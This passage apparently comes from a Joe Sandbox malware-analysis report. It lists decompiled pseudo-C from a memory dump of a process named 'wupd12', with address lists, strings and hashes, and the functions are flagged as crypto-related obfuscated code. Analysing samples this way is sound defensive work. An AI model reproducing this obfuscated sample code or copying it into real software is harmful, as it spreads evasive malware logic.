				_t161 = E004C5A40(E004CC4D5(E004C6853(_t158, __ebx, _a4 & 0x000009e7,  *((intOrPtr*)(__ebx + 0x49904c)),  *((intOrPtr*)(__ebx + 0x499048)),  *((intOrPtr*)(__ebx + 0x499044))), __ebx,  *((intOrPtr*)(__ebx + 0x499020)),  *((intOrPtr*)(__ebx + 0x49901c))), __ebx, _a4 & 0x000009e7,  *((intOrPtr*)(__ebx + 0x403570)),  *((intOrPtr*)(__ebx + 0x40356c)),  *((intOrPtr*)(__ebx + 0x403568)));
				_a4 = _a4 & 0x00006af5;
				_a4 = _a4 - _t193 - 1;
				 *(__ebx + 0x4031dc) = 0xcfbc;
				 *(__ebx + 0x4031dc) =  *(__ebx + 0x4031dc) + 1;
				_t180 = E004CD078((E004C6139(_t161 & 0x0000bb2b, __ebx, _a4 & 0x000009e7,  *((intOrPtr*)(__ebx + 0x403578)),  *((intOrPtr*)(__ebx + 0x403574))) ^ 0x000064e2) + _t177 -  *(__ebx + 0x4031d8) ^ 0x00000000, __ebx,  *((intOrPtr*)(__ebx + 0x49902c)),  *((intOrPtr*)(__ebx + 0x499028)),  *((intOrPtr*)(__ebx + 0x499024)));
				_v12 = _t183;
				_t168 = E004C2607(_t167, __ebx,  *(__ebx + 0x4031d8) & 0x0000325f,  *((intOrPtr*)(__ebx + 0x403564)),  *((intOrPtr*)(__ebx + 0x403560)));
				_v12 = _v12 | _t180;
				 *(__ebx + 0x4031dc) =  *(__ebx + 0x4031dc) + 0x37bb;
				_t190 = (_t187 | 0x00000019) ^ 0;
				_v8 = _v8 - _t190;
				_t171 = E004C43F0(_t168 - 0x00003734 ^ 0x0000dbce, __ebx, _v12 & _t168 - 0x00003734,  *((intOrPtr*)(__ebx + 0x403590)),  *((intOrPtr*)(__ebx + 0x40358c)),  *((intOrPtr*)(__ebx + 0x403588)));
				_v12 = _v12 & _t180;
				_t173 = E004CCD0E(_t171 & 0x00009af5, __ebx,  *((intOrPtr*)(__ebx + 0x403554)));
				_v8 = _v8 + 0x793e;
				_v8 = _v8 ^ (_t190 | _t180);
				 *(__ebx + 0x4031dc) =  *(__ebx + 0x4031dc) + (_t183 ^ _v8);
				 *(__ebx + 0x4031d8) = 0x1d69;
				 *(__ebx + 0x4031d8) =  *(__ebx + 0x4031d8) - 1;
				_v12 = _v12 | _t173;
				_t174 = E004CD770(_t173, __ebx,  *((intOrPtr*)(__ebx + 0x403584)));
				_a4 = 0;
				_a8 = _a8 + 1;
				_a4 = _a4 | _t180;
				return _t174 + 0x511f;
			}

0x004cb3eb
0x004cb3fb
0x004cb414
0x004cb419
0x004cb424
0x004cb429
0x004cb42f
0x004cb437
0x004cb43e
0x004cb448
0x004cb454
0x004cb470
0x004cb475
0x004cb485
0x004cb48c
0x004cb4aa
0x004cb4af
0x004cb4c5
0x004cb4c8
0x004cb4cf
0x004cb4d9
0x004cb527
0x004cb52c
0x004cb533
0x004cb548
0x004cb54d
0x004cb550
0x004cb58d
0x004cb592
0x004cb599
0x004cb59c
0x004cb5a6
0x004cb5fa
0x004cb5fc
0x004cb60b
0x004cb614
0x004cb617
0x004cb62f
0x004cb632
0x004cb647
0x004cb651
0x004cb65f
0x004cb66e
0x004cb67c
0x004cb684
0x004cb68e
0x004cb69e
0x004cb6aa
0x004cb6b3
0x004cb6be
0x004cb6c7
0x004cb6d0
0x004cb6dc

Strings

g3, xrefs: 004CB454
>y, xrefs: 004CB66E
_2, xrefs: 004CB5CC

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: >y$_2$g3
API String ID: 0-1524717188
Opcode ID: d7aa9f4a0e9ab6feb381c903689e970a22b27336bf16cecfd9b887397287db97
Instruction ID: ee0eeee12c4349813b9736175606d75ce5f3cbf05d2ef4fafd88b74285a07b23
Opcode Fuzzy Hash: d7aa9f4a0e9ab6feb381c903689e970a22b27336bf16cecfd9b887397287db97
Instruction Fuzzy Hash: 80712B32900204BFFF459F65C886A997F75FF09309F1880ADAD086D06AC77A5A74DF68

Uniqueness

Uniqueness Score: 100.00%

Function 004C6139, Relevance: 3.9, Strings: 3, Instructions: 113
UNIQUECrypto

Download Yara Rule

C-Code - Quality: 100%

			E004C6139(void* __eax, void* __ebx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _t89;
				signed int _t90;
				void* _t91;
				void* _t94;
				signed int _t98;
				signed int _t108;
				signed int _t111;
				void* _t123;
				signed int _t127;
				signed int _t133;
				signed int _t135;

				_t142 = __eflags;
				_v8 = _v8 | 0x0000462c;
				 *(__ebx + 0x403238) = 0xd91e;
				_a8 = 0x6689;
				_v16 = _v16 ^ 0x000020d7;
				_t89 = E004C6D33(_v16, __ebx, __eflags,  *((intOrPtr*)(__ebx + 0x499174)),  *((intOrPtr*)(__ebx + 0x499170)));
				_v16 = _v16 - 1;
				_t133 = _t89;
				_t90 = E004C860B(_t89, __ebx,  *((intOrPtr*)(__ebx + 0x49916c)),  *((intOrPtr*)(__ebx + 0x499168)));
				 *(__ebx + 0x403238) =  *(__ebx + 0x403238) - 0xc19e;
				_a8 = _a8 ^ _t90;
				_v12 = _v12 & _t90;
				_v8 = _v8 - 0xa8b;
				_a4 = 0xe969;
				_t91 = E004C9C3B(_t90, __ebx, _t142,  *((intOrPtr*)(__ebx + 0x403674)));
				 *((intOrPtr*)(__ebx + 0x40323c)) =  *((intOrPtr*)(__ebx + 0x40323c)) - 0x2f2d;
				_t127 = _t123 -  *(__ebx + 0x403238) + 1 + _t133 - _v12;
				_t94 = E004C6B77(_t91 - 0x0000813a & 0x000016da, __ebx,  *((intOrPtr*)(__ebx + 0x403688)),  *((intOrPtr*)(__ebx + 0x403684)));
				 *(__ebx + 0x403238) =  *(__ebx + 0x403238) + 1;
				 *(__ebx + 0x403238) =  *(__ebx + 0x403238) | 0x0000a501;
				_t98 = E004C9207(_t94 - 0x00000001 ^ 0x4773, __ebx, _t133 & _t127,  *((intOrPtr*)(__ebx + 0x403680)),  *((intOrPtr*)(__ebx + 0x40367c)),  *((intOrPtr*)(__ebx + 0x403678)));
				_v12 = _v12 - _t127;
				_a4 = _a4 ^ _t127;
				 *((intOrPtr*)(__ebx + 0x40323c)) =  *((intOrPtr*)(__ebx + 0x40323c)) - (_t98 | 0x0000f794);
				 *((intOrPtr*)(__ebx + 0x40323c)) =  *((intOrPtr*)(__ebx + 0x40323c)) + 1;
				 *(__ebx + 0x403238) = (_t135 & 0x00004cd1) + 0xf86d - 0xbc42 + 1;
				_a8 = _a8 + 1;
				 *((intOrPtr*)(__ebx + 0x40323c)) =  *((intOrPtr*)(__ebx + 0x40323c)) + _t133;
				 *(__ebx + 0x403238) =  *(__ebx + 0x403238) & 0x000015af;
				_t108 = E004C550B(0x3e93, __ebx, _t133 & _t127,  *((intOrPtr*)(__ebx + 0x403670)),  *((intOrPtr*)(__ebx + 0x40366c)));
				_a4 = _a4 - 1;
				_v12 = _v12 & 0x00000000;
				_a4 = _a4 ^ 0x00000000;
				_a4 = _a4 ^ _t133;
				 *(__ebx + 0x403238) =  *(__ebx + 0x403238) | _a8;
				_t111 = _t108 ^ _a4 ^ 0;
				 *(__ebx + 0x403238) = 0x167c;
				_a4 = _a4 - 1;
				_v12 = _v12 ^ _t111;
				_a4 = 0xf286;
				_v16 = _v16 & 0x000042af;
				return _t111 + 0x6c8e;
			}

0x004c6139
0x004c615a
0x004c6171
0x004c617b
0x004c6182
0x004c6195
0x004c619a
0x004c619d
0x004c61b1
0x004c61b6
0x004c61c0
0x004c61c4
0x004c61c9
0x004c61d0
0x004c61dd
0x004c61f3
0x004c61fd
0x004c620c
0x004c621f
0x004c6225
0x004c6241
0x004c6246
0x004c6249
0x004c6252
0x004c6258
0x004c625e
0x004c6279
0x004c628b
0x004c6296
0x004c62ae
0x004c62b6
0x004c62bf
0x004c62c5
0x004c62d5
0x004c62e2
0x004c62ee
0x004c62f9
0x004c6309
0x004c6312
0x004c6324
0x004c632b
0x004c6338

Strings

i, xrefs: 004C61D0
,F, xrefs: 004C615A
-/, xrefs: 004C61F3

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: ,F$-/$i
API String ID: 0-949201184
Opcode ID: 12b35c3ef8c3abf1457cacade1e30328201c88b6e6d09954af04ff6d2e323112
Instruction ID: 4fef901355fde96e680e9131c0a7de4efe89f6f692840181437a33fc497d049b
Opcode Fuzzy Hash: 12b35c3ef8c3abf1457cacade1e30328201c88b6e6d09954af04ff6d2e323112
Instruction Fuzzy Hash: 40518072810144ABFF048F61C88AA597F75FF44316F18C1BEAC09AE19AC73987648B69

Uniqueness

Uniqueness Score: 100.00%

Function 004C895D, Relevance: 3.9, Strings: 3, Instructions: 111
UNIQUECrypto

Download Yara Rule

C-Code - Quality: 100%

			E004C895D(void* __eax, void* __ebx, signed int _a4, intOrPtr _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t108;
				void* _t110;
				signed int _t113;
				signed int _t123;
				signed int _t131;
				signed int _t136;
				void* _t142;

				_v12 = _v12 - 1;
				 *(__ebx + 0x403224) =  *(__ebx + 0x403224) + _t131;
				_v12 = _v12 ^ _t123;
				 *((intOrPtr*)(__ebx + 0x403220)) =  *((intOrPtr*)(__ebx + 0x403220)) + 1;
				_t103 = _t142 - 0x4c71;
				_v12 = _v12 | _t131;
				_a8 = _a8 + (_t136 ^ 0x0000ed3f);
				 *(__ebx + 0x403224) =  *(__ebx + 0x403224) | _t142 - 0x4c71;
				_t106 = E004C4227(_t103 ^ 0x00000000, __ebx,  *((intOrPtr*)(__ebx + 0x403650)),  *((intOrPtr*)(__ebx + 0x40364c))) - 0x2bdd;
				_v12 = _v12 ^ 0;
				 *(__ebx + 0x403224) =  *(__ebx + 0x403224) + 0xcd1d;
				_a4 = _a4 & E004C4227(_t103 ^ 0x00000000, __ebx,  *((intOrPtr*)(__ebx + 0x403650)),  *((intOrPtr*)(__ebx + 0x40364c))) - 0x00002bdd;
				 *((intOrPtr*)(__ebx + 0x403220)) =  *((intOrPtr*)(__ebx + 0x403220)) + 1;
				_v12 = _v12 - 1;
				 *(__ebx + 0x403224) =  *(__ebx + 0x403224) + 0x7c61;
				_t108 = E004C134E(_t106 & 0x0000f8a1, __ebx,  *((intOrPtr*)(__ebx + 0x403640)),  *((intOrPtr*)(__ebx + 0x40363c)),  *((intOrPtr*)(__ebx + 0x403638)));
				_a8 = 0x46da;
				 *(__ebx + 0x403224) =  *(__ebx + 0x403224) + _t108;
				_t110 = E004C64E2(_t108 - 1, __ebx,  *((intOrPtr*)(__ebx + 0x499128)),  *((intOrPtr*)(__ebx + 0x499124)),  *((intOrPtr*)(__ebx + 0x499120)));
				_a8 = _a8 - 1;
				_t113 = E004C1F4C(_t110 - 0x00008a0e ^ 0x00009460, __ebx,  *((intOrPtr*)(__ebx + 0x403648)),  *((intOrPtr*)(__ebx + 0x403644)));
				_a12 = _a12 ^ 0;
				 *(__ebx + 0x403224) =  *(__ebx + 0x403224) ^ 0x00000000;
				E004C4AC4(_t113 & 0x00000000, __ebx, _a12 & 0xffffffffffffea35,  *((intOrPtr*)(__ebx + 0x49911c)));
				 *(__ebx + 0x403224) =  *(__ebx + 0x403224) & 0x00000000;
				_v8 = _v8 | 0x0000961d;
				_a8 = _a8 + 0x54a7;
				_a8 = 0xcd0a;
				 *(__ebx + 0x403224) = 0x9337;
				 *((intOrPtr*)(__ebx + 0x403220)) =  *((intOrPtr*)(__ebx + 0x403220)) - 1;
				_v16 = _v16 ^ 0x0000821c;
				_a8 = _a8 - 0x1ded;
				_a4 = _a4 - 0x6668;
				_a12 = _a12 + 1;
				_v16 = 0x265;
				 *(__ebx + 0x403224) =  *(__ebx + 0x403224) ^ 0x00000000;
				_a8 = _a8 - 1;
				_a8 = _a8 + 1;
				 *(__ebx + 0x403224) =  *(__ebx + 0x403224) + 1;
				_v12 = 0xffffffffffffffff;
				return 0;
			}

0x004c896a
0x004c8974
0x004c897a
0x004c898b
0x004c899e
0x004c89a3
0x004c89a6
0x004c89a9
0x004c89d4
0x004c89e0
0x004c89e3
0x004c89ee
0x004c89f1
0x004c89f7
0x004c89fa
0x004c8a1c
0x004c8a21
0x004c8a28
0x004c8a4d
0x004c8a57
0x004c8a73
0x004c8a81
0x004c8a84
0x004c8a91
0x004c8ab7
0x004c8ac4
0x004c8acb
0x004c8ad2
0x004c8ade
0x004c8ae8
0x004c8af4
0x004c8b00
0x004c8b07
0x004c8b16
0x004c8b1f
0x004c8b2c
0x004c8b33
0x004c8b36
0x004c8b39
0x004c8b3f
0x004c8b50

Strings

a|, xrefs: 004C89FA
?, xrefs: 004C89CA
hf, xrefs: 004C8B07

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: ?$a|$hf
API String ID: 0-1999581823
Opcode ID: 052075ccb06796506ef19bc31ba6056be6ff7a0b44978370b1f9fa6bf7126046
Instruction ID: 7dbadc5c5adb33c76a57c994be173a559cd6eba498de307e34d614fa5c10da5b
Opcode Fuzzy Hash: 052075ccb06796506ef19bc31ba6056be6ff7a0b44978370b1f9fa6bf7126046
Instruction Fuzzy Hash: 15517232800205ABFF049F65DD8975A7FB5FF44316F08C5AEAC18AD09AC77D86259F18

Uniqueness

Uniqueness Score: 100.00%

Function 004C5DC3, Relevance: 3.9, Strings: 3, Instructions: 109
UNIQUECrypto

Download Yara Rule

C-Code - Quality: 100%

			E004C5DC3(void* __eax, void* __ebx, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _t80;
				void* _t86;
				signed int _t90;
				void* _t110;
				void* _t116;
				signed int _t122;
				signed int _t126;
				signed int _t128;
				signed int _t129;
				void* _t135;

				_a8 = _a8 + 0xbd68;
				_t80 = E004C1894(__eax, __ebx,  *((intOrPtr*)(__ebx + 0x403788)));
				 *(__ebx + 0x4032c8) =  *(__ebx + 0x4032c8) & 0x00000000;
				 *(__ebx + 0x4032cc) = 0x2b2c;
				_a4 = _a4 | _t128;
				_t86 = E004C3B3C(((_t80 - 0x000074cb ^ 0x0000c302) - 0x00002a41 & 0x00000000) - 0x307f, __ebx,  *((intOrPtr*)(__ebx + 0x499240)), _t135,  *((intOrPtr*)(__ebx + 0x49923c)));
				 *(__ebx + 0x4032cc) = 0x75e5;
				 *(__ebx + 0x4032cc) =  *(__ebx + 0x4032cc) & _t86 + 0x8c8f;
				_v8 = _v8 ^ 0x000099c2;
				_t90 = E004C5887(_t86 + 0xe4fa, __ebx,  *((intOrPtr*)(__ebx + 0x403778)), _t110,  *((intOrPtr*)(__ebx + 0x403774)));
				_t126 = (_t122 ^ _v8) + 0xadd2 - 1;
				 *(__ebx + 0x4032cc) = _t128;
				 *(__ebx + 0x4032cc) =  *(__ebx + 0x4032cc) + 1;
				 *(__ebx + 0x4032c8) = 0x2863;
				_a8 = _a8 ^ _t126;
				_v8 = _v8 | (_t90 & 0x0000c8ec ^ 0x57c8) + _t110 + 0x00000001 - 0x00000001 - 0x000011e3 ^ 0x0000410f;
				 *(__ebx + 0x4032c8) =  *(__ebx + 0x4032c8) ^ 0x00000000;
				 *(__ebx + 0x4032cc) = _t128;
				_t129 = _t128 + 1;
				 *(__ebx + 0x4032c8) =  *(__ebx + 0x4032c8);
				_v8 = _v8 & _t129;
				_a4 = _a4;
				 *(__ebx + 0x4032cc) = 0x3df0;
				E004C70A7((((_t90 & 0x0000c8ec ^ 0x57c8) + _t110 + 0x00000001 - 0x00000001 - 0x000011e3 ^ 0x0000410f) & 0x000088a8 ^ 0x0000dde7) & 0x0000fa14, __ebx, _v8 & 0x00001474,  *((intOrPtr*)(__ebx + 0x403784)),  *((intOrPtr*)(__ebx + 0x403780)),  *((intOrPtr*)(__ebx + 0x40377c)));
				_a8 = (_t129 ^ 0x00000000) + 0x69ec;
				 *(__ebx + 0x4032c8) =  *(__ebx + 0x4032c8) + 0x2418;
				_v8 = _v8 & _t126;
				_a4 = _a4 | 0x0000d3af;
				_v8 = _v8 + 1;
				_v8 = _v8 + 1;
				_a8 = _a8 + 0 - _v8;
				_a8 = _t116 - 0xffffffffffffbb74 ^ _a4;
				_v8 = _v8 + 1;
				return 0x538c;
			}

0x004c5dce
0x004c5de8
0x004c5ded
0x004c5e03
0x004c5e17
0x004c5e38
0x004c5e48
0x004c5e52
0x004c5e58
0x004c5e71
0x004c5e7d
0x004c5e7e
0x004c5ea5
0x004c5eab
0x004c5eba
0x004c5ebd
0x004c5ec0
0x004c5ec7
0x004c5ed9
0x004c5ee1
0x004c5ee7
0x004c5eef
0x004c5f07
0x004c5f29
0x004c5f33
0x004c5f36
0x004c5f40
0x004c5f43
0x004c5f5c
0x004c5f5f
0x004c5f67
0x004c5f71
0x004c5f93
0x004c5fa1

Strings

vX, xrefs: 004C5E24
u, xrefs: 004C5E48
c(, xrefs: 004C5EAB

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: c($vX$u
API String ID: 0-4151427160
Opcode ID: 59cfad2b59bbdf9a62a1584a7dc8d2d4176f5072f822861034f9836043324cd9
Instruction ID: e5c6937de6fd645c648bbeb43608e52368955b3e32606082543e222eada747c4
Opcode Fuzzy Hash: 59cfad2b59bbdf9a62a1584a7dc8d2d4176f5072f822861034f9836043324cd9
Instruction Fuzzy Hash: 3F418176821215ABFB448F65C94679A3F68FF00716F14C1AEEC08AD096C77C87619F64

Uniqueness

Uniqueness Score: 100.00%

Function 004C2BAE, Relevance: 3.9, Strings: 3, Instructions: 107
UNIQUECrypto

Download Yara Rule

C-Code - Quality: 100%

			E004C2BAE(signed int __eax, void* __ebx, intOrPtr _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* _t82;
				void* _t83;
				signed int _t87;
				signed int _t90;
				signed int _t103;
				signed int _t122;
				signed int _t131;

				_a4 = 0x8f19;
				_a4 = _a4 - 1;
				_t82 = E004C16EF(__eax ^ 0x00000000, __ebx,  *((intOrPtr*)(__ebx + 0x4037d8)),  *((intOrPtr*)(__ebx + 0x4037d4)),  *((intOrPtr*)(__ebx + 0x4037d0)));
				_v8 = _v8 & 0x0000d14c;
				_v12 = 0x7b3;
				_t83 = E004C5C1B(_t82, __ebx, _t82,  *((intOrPtr*)(__ebx + 0x499290)));
				_v8 = _v8 - 0x85ab;
				 *(__ebx + 0x403310) =  *(__ebx + 0x403310) ^ 0x000000d2;
				_t87 = (E004C37A0(_t83, __ebx,  *((intOrPtr*)(__ebx + 0x4037cc))) & 0x00003274) - 0x00002557 & 0x00000000;
				 *(__ebx + 0x403314) =  *(__ebx + 0x403314) | 0x00002cfd;
				_a8 = _a8 - _t87;
				 *(__ebx + 0x403310) =  *(__ebx + 0x403310) + 1;
				_a12 = _a12 & 0x00003134;
				_a4 = _a4 + 0x84ba;
				_t90 = (_t87 - 0x00006f56 ^ 0x00000000) - 1;
				_a8 = _a8 ^ 0x00000000;
				_v8 = _v8 ^ 0x0000ab66;
				_a12 = _a12 & _t90;
				_v12 = 0xd98c;
				 *(__ebx + 0x403314) =  *(__ebx + 0x403314) ^ 0x000028f7;
				_a4 = _a4 - 0x144;
				_a8 = _a8 ^ 0x00000000;
				_t131 = ((_t122 & 0x000098df ^ 0x00003c39) - 0x0000d0dc + 0x00006c2b & 0x0000d14c ^ _t103) - 0x00000001 ^ 0x00006168;
				 *(__ebx + 0x403310) = 0xab66;
				_a12 = _a12 + (_t90 & 0x00000000);
				_a4 = _a4 + _t131;
				 *(__ebx + 0x403314) = 0xe357;
				_v16 = _v16 - 0xfbf9;
				_a4 = _a4 - 1;
				E004C550B(_t90 & 0x00000000, __ebx, _t90 & 0x0000d90a,  *((intOrPtr*)(__ebx + 0x499298)),  *((intOrPtr*)(__ebx + 0x499294)));
				_v16 = _v16 - 1;
				 *(__ebx + 0x403310) =  *(__ebx + 0x403310) & 0x00000f31;
				_v12 = _v12 + (0xbe7a | _t131 + 0x0000b624);
				_a12 = _a4 - 0x0000b923 ^ (0x39f6 | _v16) & 0x000040ee;
				 *(__ebx + 0x403314) = 0x8ff3;
				_v16 = _v16 - 1;
				return 0x74e8;
			}

0x004c2bb9
0x004c2bc0
0x004c2be7
0x004c2bf2
0x004c2c00
0x004c2c0e
0x004c2c13
0x004c2c22
0x004c2c41
0x004c2c4e
0x004c2c62
0x004c2c6a
0x004c2c70
0x004c2c81
0x004c2c88
0x004c2c89
0x004c2c92
0x004c2c95
0x004c2c98
0x004c2ca1
0x004c2cab
0x004c2cb2
0x004c2cbb
0x004c2cc1
0x004c2cc7
0x004c2cca
0x004c2ccd
0x004c2cd8
0x004c2cdf
0x004c2cfa
0x004c2cff
0x004c2d4d
0x004c2d57
0x004c2d5a
0x004c2d67
0x004c2d78
0x004c2d81

Strings

41, xrefs: 004C2C70
W, xrefs: 004C2CCD
fA, xrefs: 004C2D13

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: 41$W$fA
API String ID: 0-3073627902
Opcode ID: 2689e1e1be3a916a83c6a7ac9dfce1c0cc63a253ea1ec4a181b216cd8e7eedb5
Instruction ID: c934e967721cc1f4270c0a5f6a0755cf7afcd0a5bd29bb0473ce6c484522a90c
Opcode Fuzzy Hash: 2689e1e1be3a916a83c6a7ac9dfce1c0cc63a253ea1ec4a181b216cd8e7eedb5
Instruction Fuzzy Hash: EB419672C10205ABFB448F65C98579E7BB5FF40315F14C57EAC18AA1C6CB7C8B548BA4

Uniqueness

Uniqueness Score: 100.00%

Function 004C476D, Relevance: 3.9, Strings: 3, Instructions: 106
UNIQUECrypto

Download Yara Rule

C-Code - Quality: 100%

			E004C476D(signed int __eax, void* __ebx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _t119;
				void* _t132;
				void* _t134;
				void* _t137;
				signed int _t141;
				signed int _t142;
				signed int _t145;
				void* _t150;
				signed int _t152;
				signed int _t153;
				signed int _t154;

				_t152 = _t150 - E004CA565(__eax ^ 0x00009452, __ebx,  *((intOrPtr*)(__ebx + 0x4038d8)),  *((intOrPtr*)(__ebx + 0x4038d4)),  *((intOrPtr*)(__ebx + 0x4038d0))) - 1;
				 *(__ebx + 0x4033ec) =  *(__ebx + 0x4033ec) ^ _t152;
				_a4 = _a4 - 0x6e85;
				_t153 = _t152 | _a4;
				_v8 = _v8 ^ 0x00000000;
				_v8 = _v8 | 0x00007080;
				_v8 = _v8 & 0x00007d93;
				_v8 = _v8 - 1;
				_a4 = _a4 & 0x0000ed32;
				_a8 = _a8 & 0x000035b0;
				_t141 = (_t137 -  *(__ebx + 0x4033ec) &  *(__ebx + 0x4033e8)) - 0x00000001 | 0x00008903;
				_t119 = E004C4227(_t116 + 0x7e00 - 0x4d0c, __ebx,  *((intOrPtr*)(__ebx + 0x4993b4)),  *((intOrPtr*)(__ebx + 0x4993b0)));
				_v8 = _v8 | _t119;
				_a4 = _a4 | _t153;
				_a4 = 0x486e;
				_v8 = 0x1bff;
				 *(__ebx + 0x4033e8) =  *(__ebx + 0x4033e8) + _t134;
				_a8 = _a8 ^ _t141;
				_a4 = _a4 - 1;
				 *(__ebx + 0x4033ec) = 0x5570;
				_t154 = _t153 - 1;
				 *(__ebx + 0x4033e8) =  *(__ebx + 0x4033e8) + _t154;
				_v8 = _v8 + 0x7d93;
				 *(__ebx + 0x4033e8) =  *(__ebx + 0x4033e8) + 1;
				 *(__ebx + 0x4033e8) =  *(__ebx + 0x4033e8) + 1;
				_t142 = _t141 -  *(__ebx + 0x4033e8);
				 *(__ebx + 0x4033e8) =  *(__ebx + 0x4033e8) - 1;
				_a4 = _a4 - 1;
				_a4 = _a4 | _t142;
				_v8 = _v8 ^ 0x00000000;
				_a8 = _a8 - 1;
				_a4 = _a4 + 1;
				_v8 = _v8 ^ 0x00009c0d;
				_t145 = (_t142 | (((((_t119 ^  *(__ebx + 0x4033e8)) - 0x0000622b ^ 0x00007659) & 0x00000000) - 0x000098e6 + 0x0000d479 ^ 0x0000b99e) & 0x00005ed8) - 0x00006d6d ^ 0xefac) ^ _a4 |  *(__ebx + 0x4033ec);
				_v8 = _v8 - _t145;
				_v8 = _v8 + 0x8485;
				_a8 = _a8 | _t145;
				_t132 = E004C5366(((((((_t119 ^  *(__ebx + 0x4033e8)) - 0x0000622b ^ 0x00007659) & 0x00000000) - 0x000098e6 + 0x0000d479 ^ 0x0000b99e) & 0x00005ed8) - 0x00006d6d ^ 0xefac) + 1, __ebx,  *((intOrPtr*)(__ebx + 0x4038e4)),  *((intOrPtr*)(__ebx + 0x4038e0)),  *((intOrPtr*)(__ebx + 0x4038dc)));
				_v8 = _v8 + _t132;
				_v8 = _v8 & _t154;
				 *(__ebx + 0x4033ec) =  *(__ebx + 0x4033ec) + 1;
				return _t132;
			}

0x004c479d
0x004c47a9
0x004c47af
0x004c47bc
0x004c47c4
0x004c47c8
0x004c47cf
0x004c47e2
0x004c47ee
0x004c47f5
0x004c47fc
0x004c480e
0x004c4816
0x004c4819
0x004c481c
0x004c483d
0x004c4844
0x004c484f
0x004c4852
0x004c485a
0x004c4864
0x004c486a
0x004c4870
0x004c4889
0x004c488f
0x004c4895
0x004c489b
0x004c48ab
0x004c48b0
0x004c48bd
0x004c48c3
0x004c48c9
0x004c48d0
0x004c48df
0x004c48e5
0x004c48ea
0x004c48f1
0x004c4906
0x004c490b
0x004c490e
0x004c4911
0x004c491d

Strings

nH, xrefs: 004C481C
vO, xrefs: 004C4873
pU, xrefs: 004C485A

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: nH$pU$vO
API String ID: 0-4007224012
Opcode ID: ad02b21e1038eff69d6566857697865bac2cc35431a629f7c06117bbd63dffbf
Instruction ID: 129b1cd1e3b840e0d2defd4c1f043bf63bfd8c153ef472bf3c8a0c99b99781d9
Opcode Fuzzy Hash: ad02b21e1038eff69d6566857697865bac2cc35431a629f7c06117bbd63dffbf
Instruction Fuzzy Hash: 75414F32C10604EFEB44CF65C99569E7BB5FF40716F14C1AAEC08AE096CB398B64AF54

Uniqueness

Uniqueness Score: 100.00%

Function 004C2103, Relevance: 3.9, Strings: 3, Instructions: 106
UNIQUECrypto

Download Yara Rule

C-Code - Quality: 100%

			E004C2103(void* __eax, void* __ebx, void* __eflags, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				signed int _v8;
				signed int _t90;
				signed int _t93;
				void* _t111;
				signed int _t113;
				signed int _t116;
				void* _t119;
				signed int _t125;
				signed int _t127;
				signed int _t130;

				E004CCD0E(E004C43F0(__eax, __ebx, __eflags,  *((intOrPtr*)(__ebx + 0x4991f4)),  *((intOrPtr*)(__ebx + 0x4991f0)),  *((intOrPtr*)(__ebx + 0x4991ec))), __ebx,  *((intOrPtr*)(__ebx + 0x4991e8)));
				_v8 = _v8 ^ 0x000087b3;
				_a12 = 0x178e;
				_a8 = _a8 + 0x5124;
				_a8 = _a8 - 0x5f4;
				 *(__ebx + 0x40329c) = _t113;
				_a12 = _a12 + 1;
				_t127 = _t125 & 0x0000c6a7 & _a12;
				_v8 = _v8 | 0x00006996;
				 *(__ebx + 0x40329c) =  *(__ebx + 0x40329c) & 0x00000000;
				 *(__ebx + 0x40329c) = 0xd18f;
				_v8 = _v8 + 1;
				_v8 = _v8 - 1;
				_v8 = _t127;
				_t90 = E004C1BD4(0, __ebx,  *((intOrPtr*)(__ebx + 0x403740)));
				_v8 = 0x7648;
				_t93 = _t90 & 0x00002be1 ^ _v8;
				 *(__ebx + 0x403298) =  *(__ebx + 0x403298) | _t93;
				_a12 = _a12 ^ 0x0000e142;
				_t116 = (_v8 & 0x00001e72) + 1;
				_t130 = _t127 + 1 - 1 + _t119 - 0xb12 + _a4 + 0x1006;
				_t96 = (_t93 ^ 0x00000000) & 0;
				_a12 = _a12 + 1;
				_v8 = _v8 & _t130;
				 *(__ebx + 0x40329c) =  *(__ebx + 0x40329c) & (_t93 ^ 0x00000000) & 0;
				_v8 = 0;
				_a12 = _a12 | _t130;
				_v8 = _v8;
				_v8 = _v8 - 1;
				_v8 = _v8 + 0x90e;
				_a12 = _a12 - 0x8c31;
				_a8 = _a8 + 0x21c;
				_a4 = _a4 - 1;
				_a4 = _a4 - 1;
				 *(__ebx + 0x403298) =  *(__ebx + 0x403298) - 0x9a54;
